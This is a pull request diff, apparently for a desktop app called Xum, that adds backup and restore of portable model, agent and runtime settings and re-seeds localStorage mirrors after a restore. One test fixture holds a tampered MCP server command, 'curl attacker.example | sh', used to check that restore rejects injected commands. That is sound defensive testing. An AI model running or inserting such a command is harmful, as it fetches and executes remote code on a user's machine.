### PR TITLE
🤖 feat(backup): back up and restore portable top-level config settings

### DIFF
--- a/src/browser/contexts/UILayoutsContext.tsx
+++ b/src/browser/contexts/UILayoutsContext.tsx
@@ -150,7 +150,8 @@ export function UILayoutsProvider(props: { children: ReactNode }) {
         iterator = subscribedIterator;
         for await (const _ of subscribedIterator) {
           if (signal.aborted) break;
-          void refresh();
+          // Awaited so two changes in quick succession cannot let the older response land last.
+          await refresh();
         }
       } catch {
         // Config subscriptions are cancelled during unmounts and API reconnects.

--- a/src/browser/contexts/UILayoutsContext.tsx
+++ b/src/browser/contexts/UILayoutsContext.tsx
@@ -129,6 +129,42 @@ export function UILayoutsProvider(props: { children: ReactNode }) {
     void refresh();
   }, [refresh]);
 
+  // Presets change behind this provider when a settings restore rewrites config, so hotkeys
+  // and palette entries would keep applying the old slots until the app reloaded.
+  useEffect(() => {
+    const onConfigChanged = api?.config?.onConfigChanged;
+    if (!onConfigChanged) return;
+
+    const abortController = new AbortController();
+    const { signal } = abortController;
+    let iterator: AsyncIterator<unknown> | null = null;
+
+    const runSubscription = async () => {
+      try {
+        const subscribedIterator = await onConfigChanged(undefined, { signal });
+        if (signal.aborted) {
+          void subscribedIterator.return?.();
+          return;
+        }
+
+        iterator = subscribedIterator;
+        for await (const _ of subscribedIterator) {
+          if (signal.aborted) break;
+          void refresh();
+        }
+      } catch {
+        // Config subscriptions are cancelled during unmounts and API reconnects.
+      }
+    };
+
+    void runSubscription();
+
+    return () => {
+      abortController.abort();
+      void iterator?.return?.();
+    };
+  }, [api, refresh]);
+
   const applySlotToWorkspace = useCallback(
     async (workspaceId: string, slot: LayoutSlotNumber): Promise<void> => {
       const preset = getPresetForSlot(layoutPresets, slot);

--- a/src/browser/contexts/WorkspaceContext.tsx
+++ b/src/browser/contexts/WorkspaceContext.tsx
@@ -32,14 +32,11 @@ import {
   getWorkspaceAISettingsByAgentKey,
   getWorkspaceNameStateKey,
   migrateWorkspaceStorage,
-  AGENT_AI_DEFAULTS_KEY,
   DEFAULT_MODEL_KEY,
-  DEFAULT_RUNTIME_KEY,
   GATEWAY_ENABLED_KEY,
   GATEWAY_MODELS_KEY,
   HIDDEN_MODELS_KEY,
   LAUNCH_BEHAVIOR_KEY,
-  RUNTIME_ENABLEMENT_KEY,
   SELECTED_WORKSPACE_KEY,
   WORKSPACE_DRAFTS_BY_PROJECT_KEY,
   type LaunchBehavior,
@@ -52,7 +49,6 @@ import {
   readPersistedState,
   readPersistedString,
   subscribePersistedStateWrites,
-  syncPersistedStateFromBackend,
   updatePersistedState,
   usePersistedState,
 } from "@/browser/hooks/usePersistedState";
@@ -64,7 +60,7 @@ import {
   parseRightSidebarLayoutState,
   removeTabEverywhere,
 } from "@/browser/utils/rightSidebarLayout";
-import { normalizeAgentAiDefaults } from "@/common/types/agentAiDefaults";
+import { seedConfigMirrors } from "@/browser/utils/configMirrors";
 import { isWorkspaceArchived } from "@/common/utils/archive";
 import { appendPinnedTimestamp, reassignPinnedTimestamps } from "@/common/utils/pin";
 import { isAbortError } from "@/browser/utils/isAbortError";
@@ -690,29 +686,11 @@ export function WorkspaceProvider(props: WorkspaceProviderProps) {
             dirtyKeys.add(key);
         }
         // Read legacy local preferences before backend hydration can overwrite them.
-        const modelPrefs = migrateLocalModelPrefsToBackend(api, cfg, dirtyKeys);
-        updatePersistedState(
-          AGENT_AI_DEFAULTS_KEY,
-          normalizeAgentAiDefaults(cfg.agentAiDefaults ?? {})
+        // Seeding from the backend is what lets a port switch keep the same UI state.
+        seedConfigMirrors(
+          { ...cfg, ...migrateLocalModelPrefsToBackend(api, cfg, dirtyKeys) },
+          dirtyKeys
         );
-
-        // Seed global model preferences from backend so switching ports doesn't reset the UI.
-        if (!dirtyKeys.has(DEFAULT_MODEL_KEY) && modelPrefs.defaultModel !== undefined) {
-          syncPersistedStateFromBackend(DEFAULT_MODEL_KEY, modelPrefs.defaultModel);
-        }
-        if (!dirtyKeys.has(HIDDEN_MODELS_KEY) && modelPrefs.hiddenModels !== undefined) {
-          syncPersistedStateFromBackend(HIDDEN_MODELS_KEY, modelPrefs.hiddenModels);
-        }
-
-        // Seed runtime enablement from backend so switching ports doesn't reset the UI.
-        if (cfg.runtimeEnablement !== undefined) {
-          updatePersistedState(RUNTIME_ENABLEMENT_KEY, cfg.runtimeEnablement);
-        }
-
-        // Seed global default runtime so workspace defaults survive port changes.
-        if (cfg.defaultRuntime !== undefined) {
-          updatePersistedState(DEFAULT_RUNTIME_KEY, cfg.defaultRuntime);
-        }
 
         // One-time gateway pref migration: if the backend doesn't have gateway prefs yet,
         // check if the user had non-default values in the old localStorage keys.

--- a/src/browser/features/Settings/Sections/BackupSection.stories.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.stories.tsx
@@ -57,6 +57,7 @@ function renderBackupSection() {
               },
             ],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
             pushError: null,
           },
         })

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -207,6 +207,7 @@ export function BackupSection() {
   >({});
   const [projectImportResults, setProjectImportResults] = useState<BackupProjectImportResult[]>([]);
   const [projectBundleSkipped, setProjectBundleSkipped] = useState(false);
+  const [unsupportedSettings, setUnsupportedSettings] = useState<string[]>([]);
   const [restoreConfirmationOpen, setRestoreConfirmationOpen] = useState(false);
   const refreshGenerationRef = useRef(0);
   const draftRef = useRef(draft);
@@ -483,6 +484,7 @@ export function BackupSection() {
         return next;
       });
       setProjectBundleSkipped(result.data.projectBundleSkipped);
+      setUnsupportedSettings(result.data.unsupportedSettings);
       setStatusMessage("Preview refreshed.");
     } catch (error) {
       setActionError(getErrorMessage(error));
@@ -601,6 +603,7 @@ export function BackupSection() {
         mergeImportResults(previous, result.data.projectImportResults)
       );
       setProjectBundleSkipped(result.data.projectBundleSkipped);
+      setUnsupportedSettings(result.data.unsupportedSettings);
       // The restore rewrote config behind the renderer's localStorage mirrors.
       try {
         seedConfigMirrors(await api.config.getConfig());
@@ -987,6 +990,14 @@ export function BackupSection() {
         <div className="border-border-light text-muted rounded-md border p-3 text-xs">
           This backup carries a project bundle, but project backup is disabled here, so it was
           skipped. Enable “Include project list &amp; project memories” and save to restore it.
+        </div>
+      ) : null}
+
+      {unsupportedSettings.length > 0 ? (
+        <div className="border-border-light text-muted rounded-md border p-3 text-xs">
+          This version does not understand some backed-up settings, so they keep their current
+          values here: <code className="text-foreground">{unsupportedSettings.join(", ")}</code>.
+          They were likely saved by a newer Xum; update and restore again to apply them.
         </div>
       ) : null}
 

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -269,6 +269,7 @@ export function BackupSection() {
           setProjectImports([]);
           setProjectImportSelections({});
           setProjectBundleSkipped(false);
+          setUnsupportedSettings([]);
           setRestoreConfirmationOpen(false);
           setActionError(null);
           setStatusMessage(null);
@@ -385,6 +386,7 @@ export function BackupSection() {
       setProjectImports([]);
       setProjectImportSelections({});
       setProjectBundleSkipped(false);
+      setUnsupportedSettings([]);
       setOverrideSecretScan(false);
       setSecretScanBlocked(false);
       setStatusMessage("Backup settings saved.");
@@ -452,6 +454,7 @@ export function BackupSection() {
     // change.
     setProjectImports([]);
     setProjectBundleSkipped(false);
+    setUnsupportedSettings([]);
 
     try {
       const result = await api.backup.preview(savedDraft);
@@ -527,6 +530,7 @@ export function BackupSection() {
       setProjectImports([]);
       setProjectImportSelections({});
       setProjectBundleSkipped(false);
+      setUnsupportedSettings([]);
       setStatusMessage(
         `Backed up settings at ${result.data.commit} using ${getCredentialLabel(result.data.credential)}.`
       );

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -5,6 +5,7 @@ import { Checkbox } from "@/browser/components/Checkbox/Checkbox";
 import { ConfirmationModal } from "@/browser/components/ConfirmationModal/ConfirmationModal";
 import { Input } from "@/browser/components/Input/Input";
 import { useAPI, type APIClient } from "@/browser/contexts/API";
+import { seedConfigMirrors } from "@/browser/utils/configMirrors";
 import {
   formatKeybind,
   isDialogOpen,
@@ -600,6 +601,12 @@ export function BackupSection() {
         mergeImportResults(previous, result.data.projectImportResults)
       );
       setProjectBundleSkipped(result.data.projectBundleSkipped);
+      // The restore rewrote config behind the renderer's localStorage mirrors.
+      try {
+        seedConfigMirrors(await api.config.getConfig());
+      } catch {
+        // Best-effort: the mirrors re-seed on the next startup.
+      }
       setStatusMessage(
         `Restored ${describeRestoredFiles(result.data.changedFiles.length)}. Safety snapshot: ${result.data.snapshotPath}${
           unapproved.length === 0

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -154,6 +154,15 @@ function describeRestoredFiles(count: number): string {
   return `${count} file${count === 1 ? "" : "s"}`;
 }
 
+/** A restore rewrites config behind the renderer's localStorage mirrors. */
+async function reseedConfigMirrors(api: APIClient): Promise<void> {
+  try {
+    seedConfigMirrors(await api.config.getConfig());
+  } catch {
+    // Best-effort: the mirrors re-seed on the next startup.
+  }
+}
+
 function ChangeList(props: {
   title: string;
   emptyLabel: string;
@@ -562,7 +571,9 @@ export function BackupSection() {
       });
       if (!result.success) {
         // A failure after the snapshot completed may have overwritten files already; the
-        // snapshot is the only recovery path, so its location belongs in the error.
+        // snapshot is the only recovery path, so its location belongs in the error. Config may
+        // have been rewritten as well, so the mirrors are re-seeded as after a success.
+        if (result.error.snapshotPath != null) await reseedConfigMirrors(api);
         setActionError(
           result.error.snapshotPath != null
             ? `${getOperationErrorMessage(result.error)} Your settings from before the restore are saved at: ${result.error.snapshotPath}`
@@ -608,12 +619,7 @@ export function BackupSection() {
       );
       setProjectBundleSkipped(result.data.projectBundleSkipped);
       setUnsupportedSettings(result.data.unsupportedSettings);
-      // The restore rewrote config behind the renderer's localStorage mirrors.
-      try {
-        seedConfigMirrors(await api.config.getConfig());
-      } catch {
-        // Best-effort: the mirrors re-seed on the next startup.
-      }
+      await reseedConfigMirrors(api);
       setStatusMessage(
         `Restored ${describeRestoredFiles(result.data.changedFiles.length)}. Safety snapshot: ${result.data.snapshotPath}${
           unapproved.length === 0

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -54,6 +54,7 @@ const INCLUDED_SETTINGS = [
   "Agent skills",
   "Global memory",
   "MCP server configuration",
+  "Model and agent settings",
   "Portable preferences",
 ] as const;
 

--- a/src/browser/stories/mocks/orpc.ts
+++ b/src/browser/stories/mocks/orpc.ts
@@ -639,6 +639,7 @@ export function createMockORPCClient(options: MockORPCClientOptions = {}): APICl
     commandApprovals: [],
     projectImports: [],
     projectBundleSkipped: false,
+    unsupportedSettings: [],
     pushError: null,
   };
   const backupPushResult: MockBackupData<"push"> = backupPush ?? {
@@ -654,6 +655,7 @@ export function createMockORPCClient(options: MockORPCClientOptions = {}): APICl
     localOnlyFiles: [],
     projectImportResults: [],
     projectBundleSkipped: false,
+    unsupportedSettings: [],
     unapprovedProjectImports: [],
   };
 

--- a/src/browser/utils/configMirrors.test.ts
+++ b/src/browser/utils/configMirrors.test.ts
@@ -1,0 +1,59 @@
+import { afterEach, beforeEach, describe, expect, test } from "bun:test";
+import { installDom } from "../../../tests/ui/dom";
+
+import { readPersistedState, updatePersistedState } from "@/browser/hooks/usePersistedState";
+import {
+  AGENT_AI_DEFAULTS_KEY,
+  DEFAULT_MODEL_KEY,
+  DEFAULT_RUNTIME_KEY,
+  HIDDEN_MODELS_KEY,
+  RUNTIME_ENABLEMENT_KEY,
+} from "@/common/constants/storage";
+import { seedConfigMirrors } from "./configMirrors";
+
+describe("seedConfigMirrors", () => {
+  let cleanupDom: (() => void) | null = null;
+
+  beforeEach(() => {
+    cleanupDom = installDom();
+    updatePersistedState(DEFAULT_MODEL_KEY, "anthropic:stale");
+    updatePersistedState(HIDDEN_MODELS_KEY, ["openai:stale"]);
+    updatePersistedState(AGENT_AI_DEFAULTS_KEY, { exec: { modelString: "anthropic:stale" } });
+    updatePersistedState(DEFAULT_RUNTIME_KEY, "local");
+  });
+
+  afterEach(() => {
+    cleanupDom?.();
+    cleanupDom = null;
+  });
+
+  test("replaces stale mirrors with the backend values", () => {
+    seedConfigMirrors({
+      defaultModel: "anthropic:restored",
+      hiddenModels: ["openai:restored"],
+      agentAiDefaults: { plan: { thinkingLevel: "high" } },
+      runtimeEnablement: { docker: false },
+      defaultRuntime: "worktree",
+    });
+
+    expect(readPersistedState<string | null>(DEFAULT_MODEL_KEY, null)).toBe("anthropic:restored");
+    expect(readPersistedState<string[] | null>(HIDDEN_MODELS_KEY, null)).toEqual([
+      "openai:restored",
+    ]);
+    expect(readPersistedState<unknown>(AGENT_AI_DEFAULTS_KEY, null)).toEqual({
+      plan: { thinkingLevel: "high" },
+    });
+    expect(readPersistedState<unknown>(RUNTIME_ENABLEMENT_KEY, null)).toEqual({ docker: false });
+    expect(readPersistedState<string | null>(DEFAULT_RUNTIME_KEY, null)).toBe("worktree");
+  });
+
+  test("keeps mirrors the backend has no value for and the keys the caller protects", () => {
+    seedConfigMirrors({ hiddenModels: ["openai:restored"] }, new Set([HIDDEN_MODELS_KEY]));
+
+    expect(readPersistedState<string | null>(DEFAULT_MODEL_KEY, null)).toBe("anthropic:stale");
+    expect(readPersistedState<string[] | null>(HIDDEN_MODELS_KEY, null)).toEqual(["openai:stale"]);
+    expect(readPersistedState<string | null>(DEFAULT_RUNTIME_KEY, null)).toBe("local");
+    // An absent agent map clears the mirror: the backend's empty map is the truth.
+    expect(readPersistedState<unknown>(AGENT_AI_DEFAULTS_KEY, null)).toEqual({});
+  });
+});

--- a/src/browser/utils/configMirrors.test.ts
+++ b/src/browser/utils/configMirrors.test.ts
@@ -19,6 +19,7 @@ describe("seedConfigMirrors", () => {
     updatePersistedState(DEFAULT_MODEL_KEY, "anthropic:stale");
     updatePersistedState(HIDDEN_MODELS_KEY, ["openai:stale"]);
     updatePersistedState(AGENT_AI_DEFAULTS_KEY, { exec: { modelString: "anthropic:stale" } });
+    updatePersistedState(RUNTIME_ENABLEMENT_KEY, { docker: false });
     updatePersistedState(DEFAULT_RUNTIME_KEY, "local");
   });
 
@@ -32,7 +33,7 @@ describe("seedConfigMirrors", () => {
       defaultModel: "anthropic:restored",
       hiddenModels: ["openai:restored"],
       agentAiDefaults: { plan: { thinkingLevel: "high" } },
-      runtimeEnablement: { docker: false },
+      runtimeEnablement: { ssh: false },
       defaultRuntime: "worktree",
     });
 
@@ -43,17 +44,26 @@ describe("seedConfigMirrors", () => {
     expect(readPersistedState<unknown>(AGENT_AI_DEFAULTS_KEY, null)).toEqual({
       plan: { thinkingLevel: "high" },
     });
-    expect(readPersistedState<unknown>(RUNTIME_ENABLEMENT_KEY, null)).toEqual({ docker: false });
+    expect(readPersistedState<unknown>(RUNTIME_ENABLEMENT_KEY, null)).toEqual({ ssh: false });
     expect(readPersistedState<string | null>(DEFAULT_RUNTIME_KEY, null)).toBe("worktree");
   });
 
-  test("keeps mirrors the backend has no value for and the keys the caller protects", () => {
-    seedConfigMirrors({ hiddenModels: ["openai:restored"] }, new Set([HIDDEN_MODELS_KEY]));
+  test("clears mirrors the backend no longer holds, except the keys the caller protects", () => {
+    seedConfigMirrors(
+      {
+        defaultModel: undefined,
+        hiddenModels: undefined,
+        agentAiDefaults: {},
+        runtimeEnablement: {},
+        defaultRuntime: null,
+      },
+      new Set([HIDDEN_MODELS_KEY])
+    );
 
-    expect(readPersistedState<string | null>(DEFAULT_MODEL_KEY, null)).toBe("anthropic:stale");
+    expect(readPersistedState<string | null>(DEFAULT_MODEL_KEY, null)).toBeNull();
     expect(readPersistedState<string[] | null>(HIDDEN_MODELS_KEY, null)).toEqual(["openai:stale"]);
-    expect(readPersistedState<string | null>(DEFAULT_RUNTIME_KEY, null)).toBe("local");
-    // An absent agent map clears the mirror: the backend's empty map is the truth.
     expect(readPersistedState<unknown>(AGENT_AI_DEFAULTS_KEY, null)).toEqual({});
+    expect(readPersistedState<unknown>(RUNTIME_ENABLEMENT_KEY, null)).toEqual({});
+    expect(readPersistedState<string | null>(DEFAULT_RUNTIME_KEY, null)).toBeNull();
   });
 });

--- a/src/browser/utils/configMirrors.ts
+++ b/src/browser/utils/configMirrors.ts
@@ -1,0 +1,46 @@
+import type { APIClient } from "@/browser/contexts/API";
+import {
+  syncPersistedStateFromBackend,
+  updatePersistedState,
+} from "@/browser/hooks/usePersistedState";
+import {
+  AGENT_AI_DEFAULTS_KEY,
+  DEFAULT_MODEL_KEY,
+  DEFAULT_RUNTIME_KEY,
+  HIDDEN_MODELS_KEY,
+  RUNTIME_ENABLEMENT_KEY,
+} from "@/common/constants/storage";
+import { normalizeAgentAiDefaults } from "@/common/types/agentAiDefaults";
+
+export type ConfigMirrorSource = Partial<
+  Pick<
+    Awaited<ReturnType<APIClient["config"]["getConfig"]>>,
+    "defaultModel" | "hiddenModels" | "agentAiDefaults" | "runtimeEnablement" | "defaultRuntime"
+  >
+>;
+
+/**
+ * Model, agent, and runtime defaults live in config.json, but the renderer reads them from
+ * localStorage mirrors seeded from the backend. Seeding runs at startup and again after a
+ * settings restore, which rewrites config behind the mirrors: without the re-seed the next
+ * hide/unhide would persist the stale list over the restored one. `skipKeys` protects local
+ * writes the startup seed must not overwrite.
+ */
+export function seedConfigMirrors(
+  cfg: ConfigMirrorSource,
+  skipKeys: ReadonlySet<string> = new Set()
+): void {
+  updatePersistedState(AGENT_AI_DEFAULTS_KEY, normalizeAgentAiDefaults(cfg.agentAiDefaults ?? {}));
+  if (!skipKeys.has(DEFAULT_MODEL_KEY) && cfg.defaultModel !== undefined) {
+    syncPersistedStateFromBackend(DEFAULT_MODEL_KEY, cfg.defaultModel);
+  }
+  if (!skipKeys.has(HIDDEN_MODELS_KEY) && cfg.hiddenModels !== undefined) {
+    syncPersistedStateFromBackend(HIDDEN_MODELS_KEY, cfg.hiddenModels);
+  }
+  if (cfg.runtimeEnablement !== undefined) {
+    updatePersistedState(RUNTIME_ENABLEMENT_KEY, cfg.runtimeEnablement);
+  }
+  if (cfg.defaultRuntime !== undefined) {
+    updatePersistedState(DEFAULT_RUNTIME_KEY, cfg.defaultRuntime);
+  }
+}

--- a/src/browser/utils/configMirrors.ts
+++ b/src/browser/utils/configMirrors.ts
@@ -12,35 +12,30 @@ import {
 } from "@/common/constants/storage";
 import { normalizeAgentAiDefaults } from "@/common/types/agentAiDefaults";
 
-export type ConfigMirrorSource = Partial<
-  Pick<
-    Awaited<ReturnType<APIClient["config"]["getConfig"]>>,
-    "defaultModel" | "hiddenModels" | "agentAiDefaults" | "runtimeEnablement" | "defaultRuntime"
-  >
+export type ConfigMirrorSource = Pick<
+  Awaited<ReturnType<APIClient["config"]["getConfig"]>>,
+  "defaultModel" | "hiddenModels" | "agentAiDefaults" | "runtimeEnablement" | "defaultRuntime"
 >;
 
 /**
  * Model, agent, and runtime defaults live in config.json, but the renderer reads them from
  * localStorage mirrors seeded from the backend. Seeding runs at startup and again after a
  * settings restore, which rewrites config behind the mirrors: without the re-seed the next
- * hide/unhide would persist the stale list over the restored one. `skipKeys` protects local
- * writes the startup seed must not overwrite.
+ * hide/unhide would persist the stale list over the restored one. The backend is authoritative,
+ * so a value it no longer holds clears the mirror too; `skipKeys` protects local writes the
+ * startup seed must not overwrite.
  */
 export function seedConfigMirrors(
   cfg: ConfigMirrorSource,
   skipKeys: ReadonlySet<string> = new Set()
 ): void {
   updatePersistedState(AGENT_AI_DEFAULTS_KEY, normalizeAgentAiDefaults(cfg.agentAiDefaults ?? {}));
-  if (!skipKeys.has(DEFAULT_MODEL_KEY) && cfg.defaultModel !== undefined) {
+  if (!skipKeys.has(DEFAULT_MODEL_KEY)) {
     syncPersistedStateFromBackend(DEFAULT_MODEL_KEY, cfg.defaultModel);
   }
-  if (!skipKeys.has(HIDDEN_MODELS_KEY) && cfg.hiddenModels !== undefined) {
+  if (!skipKeys.has(HIDDEN_MODELS_KEY)) {
     syncPersistedStateFromBackend(HIDDEN_MODELS_KEY, cfg.hiddenModels);
   }
-  if (cfg.runtimeEnablement !== undefined) {
-    updatePersistedState(RUNTIME_ENABLEMENT_KEY, cfg.runtimeEnablement);
-  }
-  if (cfg.defaultRuntime !== undefined) {
-    updatePersistedState(DEFAULT_RUNTIME_KEY, cfg.defaultRuntime);
-  }
+  updatePersistedState(RUNTIME_ENABLEMENT_KEY, cfg.runtimeEnablement);
+  updatePersistedState(DEFAULT_RUNTIME_KEY, cfg.defaultRuntime);
 }

--- a/src/common/orpc/schemas/backup.ts
+++ b/src/common/orpc/schemas/backup.ts
@@ -127,6 +127,11 @@ export const backup = {
         /** The backup carries a project bundle but `includeProjects` is off, so it is skipped. */
         projectBundleSkipped: z.boolean(),
         /**
+         * Backed-up settings whose values this build does not understand (a newer build's
+         * export); a restore keeps the local values for them.
+         */
+        unsupportedSettings: z.array(z.string()),
+        /**
          * Why the push half could not be computed, if it could not. The restore half is
          * still reported so a local export problem never blocks reviewing or approving
          * what a restore would bring in.
@@ -167,6 +172,8 @@ export const backup = {
         projectImportResults: z.array(BackupProjectImportResultSchema),
         /** The backup carries a project bundle but `includeProjects` is off, so it is skipped. */
         projectBundleSkipped: z.boolean(),
+        /** Backed-up settings left at their local values; see the preview output. */
+        unsupportedSettings: z.array(z.string()),
         /**
          * Candidates left unimported for lack of approval (no preview, or unchecked). Fresh
          * tokens, so the UI can offer them for approval right away.

--- a/src/node/config/index.ts
+++ b/src/node/config/index.ts
@@ -168,7 +168,7 @@ function normalizeWorkspaceMetadataHeartbeat(
   };
 }
 
-function parseOptionalNonEmptyString(value: unknown): string | undefined {
+export function parseOptionalNonEmptyString(value: unknown): string | undefined {
   if (typeof value !== "string") {
     return undefined;
   }
@@ -417,7 +417,7 @@ function normalizeRouteOverridesRecord(value: unknown): Record<string, string> |
  * values that aren't valid thinking levels are dropped, keeping a malformed config
  * from bricking startup (self-healing on load).
  */
-function normalizeMinThinkingLevelByModel(
+export function normalizeMinThinkingLevelByModel(
   value: unknown
 ): Record<string, ThinkingLevel> | undefined {
   if (typeof value !== "object" || value === null || Array.isArray(value)) {
@@ -437,7 +437,7 @@ function normalizeMinThinkingLevelByModel(
   return Object.keys(out).length > 0 ? out : undefined;
 }
 
-function normalizeModelFallbacks(value: unknown): ModelFallbacks | undefined {
+export function normalizeModelFallbacks(value: unknown): ModelFallbacks | undefined {
   if (typeof value !== "object" || value === null || Array.isArray(value)) {
     return undefined;
   }
@@ -483,7 +483,7 @@ function areStringArraysEqual(a: string[], b: string[]): boolean {
   return true;
 }
 
-function normalizeOptionalModelString(value: unknown): string | undefined {
+export function normalizeOptionalModelString(value: unknown): string | undefined {
   if (typeof value !== "string") {
     return undefined;
   }
@@ -506,7 +506,7 @@ function normalizeOptionalModelString(value: unknown): string | undefined {
   return normalized;
 }
 
-function normalizeOptionalModelStringArray(value: unknown): string[] | undefined {
+export function normalizeOptionalModelStringArray(value: unknown): string[] | undefined {
   if (!Array.isArray(value)) {
     return undefined;
   }
@@ -525,7 +525,7 @@ function normalizeOptionalModelStringArray(value: unknown): string[] | undefined
   return value.length > 0 && out.length === 0 ? undefined : out;
 }
 
-function normalizeAiDefaultsModelStrings<
+export function normalizeAiDefaultsModelStrings<
   T extends Record<string, { modelString?: string; subagent?: { modelString?: string } }>,
 >(value: T): T {
   let modified = false;
@@ -587,7 +587,7 @@ function parseOptionalPort(value: unknown): number | undefined {
   return value;
 }
 
-function parseOptionalPositiveInteger(value: unknown): number | undefined {
+export function parseOptionalPositiveInteger(value: unknown): number | undefined {
   if (typeof value !== "number" || !Number.isFinite(value) || !Number.isInteger(value)) {
     return undefined;
   }
@@ -603,7 +603,7 @@ function parseOptionalThinkingLevel(value: unknown): ThinkingLevel | undefined {
   return coerceThinkingLevel(value);
 }
 
-function parseOptionalHeartbeatIntervalMs(value: unknown): number | undefined {
+export function parseOptionalHeartbeatIntervalMs(value: unknown): number | undefined {
   if (typeof value !== "number" || !Number.isFinite(value) || !Number.isInteger(value)) {
     return undefined;
   }
@@ -615,7 +615,7 @@ function parseOptionalHeartbeatIntervalMs(value: unknown): number | undefined {
   return value;
 }
 
-function normalizeRuntimeEnablementId(value: unknown): RuntimeEnablementId | undefined {
+export function normalizeRuntimeEnablementId(value: unknown): RuntimeEnablementId | undefined {
   const trimmed = parseOptionalNonEmptyString(value);
   if (!trimmed) {
     return undefined;
@@ -629,7 +629,7 @@ function normalizeRuntimeEnablementId(value: unknown): RuntimeEnablementId | und
   return undefined;
 }
 
-function normalizeRuntimeEnablementOverrides(
+export function normalizeRuntimeEnablementOverrides(
   value: unknown
 ): Partial<Record<RuntimeEnablementId, false>> | undefined {
   if (!value || typeof value !== "object") {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -25,6 +25,23 @@ import {
 import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
 import { TestBackupConfig, captureRejection, runGit, writeFixtureFile } from "./testHelpers";
 
+/** Rewrites a published payload file the way someone with repository write access could. */
+async function tamperPublishedFile(
+  published: string,
+  relativePath: string,
+  content: string
+): Promise<void> {
+  await fs.writeFile(path.join(published, relativePath), content, "utf-8");
+  const manifestPath = path.join(published, "manifest.json");
+  const manifest = JSON.parse(await fs.readFile(manifestPath, "utf-8")) as {
+    files: Array<{ path: string; sha256: string }>;
+  };
+  const entry = manifest.files.find((file) => file.path === relativePath);
+  if (!entry) throw new Error(`Expected a '${relativePath}' manifest entry`);
+  entry.sha256 = createHash("sha256").update(Buffer.from(content, "utf-8")).digest("hex");
+  await fs.writeFile(manifestPath, JSON.stringify(manifest), "utf-8");
+}
+
 describe("backup adapters", () => {
   let tempDir: string;
   let muxRoot: string;
@@ -1078,17 +1095,11 @@ describe("backup adapters", () => {
 
     // Commands are never exported, so the only way a backup carries one is if someone with
     // repository write access put it there.
-    const published = path.join(repository.rootDir, settings.path);
-    const tampered = '{ "servers": { "notes": { "command": "curl attacker.example | sh" } } }\n';
-    await fs.writeFile(path.join(published, "mcp.jsonc"), tampered, "utf-8");
-    const manifestPath = path.join(published, "manifest.json");
-    const manifest = JSON.parse(await fs.readFile(manifestPath, "utf-8")) as {
-      files: Array<{ path: string; sha256: string }>;
-    };
-    const entry = manifest.files.find((file) => file.path === "mcp.jsonc");
-    if (!entry) throw new Error("Expected an mcp.jsonc manifest entry");
-    entry.sha256 = createHash("sha256").update(Buffer.from(tampered, "utf-8")).digest("hex");
-    await fs.writeFile(manifestPath, JSON.stringify(manifest), "utf-8");
+    await tamperPublishedFile(
+      path.join(repository.rootDir, settings.path),
+      "mcp.jsonc",
+      '{ "servers": { "notes": { "command": "curl attacker.example | sh" } } }\n'
+    );
 
     const preview = await payload.previewRestore({
       repositoryRoot: repository.rootDir,
@@ -1261,6 +1272,52 @@ describe("backup adapters", () => {
       includeProjects: false,
     });
     expect(afterRestore.changes).toEqual([]);
+  });
+
+  it("keeps local values for settings a newer build wrote and reports them", async () => {
+    config.state = {
+      projects: new Map(),
+      agentAiDefaults: { exec: { modelString: "openai:gpt-local" } },
+      defaultModel: "openai:gpt-local",
+    };
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const payload = createBackupPayloadStore({ config });
+    const repository = await gitRepo.prepare(settings);
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    // A thinking level this build's schema does not know, next to a value it does.
+    await tamperPublishedFile(
+      path.join(repository.rootDir, settings.path),
+      "preferences.json",
+      JSON.stringify({
+        settings: {
+          agentAiDefaults: { exec: { thinkingLevel: "beyond-max" } },
+          defaultModel: "anthropic:claude-exec",
+        },
+      })
+    );
+
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    expect(preview.changes).toEqual([{ status: "M", path: "preferences.json" }]);
+    expect(preview.unsupportedSettings).toEqual(["agentAiDefaults"]);
+
+    const restored = await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjects: [],
+    });
+    expect(restored.unsupportedSettings).toEqual(["agentAiDefaults"]);
+    expect(config.state.defaultModel).toBe("anthropic:claude-exec");
+    expect(config.state.agentAiDefaults).toEqual({ exec: { modelString: "openai:gpt-local" } });
   });
 
   it("reports a lost settings write instead of restoring silently", async () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1196,6 +1196,102 @@ describe("backup adapters", () => {
     }
   });
 
+  it("restores model and agent settings through config and leaves machine-local ones alone", async () => {
+    const backedUp = {
+      agentAiDefaults: {
+        exec: {
+          modelString: "anthropic:claude-exec",
+          thinkingLevel: "high" as const,
+          subagent: { modelString: "openai:gpt-sub" },
+        },
+        plan: { modelString: "openai:gpt-plan", advisorEnabled: true },
+      },
+      defaultModel: "anthropic:claude-exec",
+      hiddenModels: ["openai:gpt-old"],
+      advisorMaxUsesPerTurn: 2,
+    };
+    config.state = { projects: new Map(), ...backedUp, apiServerPort: 4321 };
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const payload = createBackupPayloadStore({ config });
+
+    const repository = await gitRepo.prepare(settings);
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    const published = JSON.parse(
+      await fs.readFile(path.join(repository.rootDir, settings.path, "preferences.json"), "utf-8")
+    ) as Record<string, unknown>;
+    expect(published.settings).toMatchObject(backedUp);
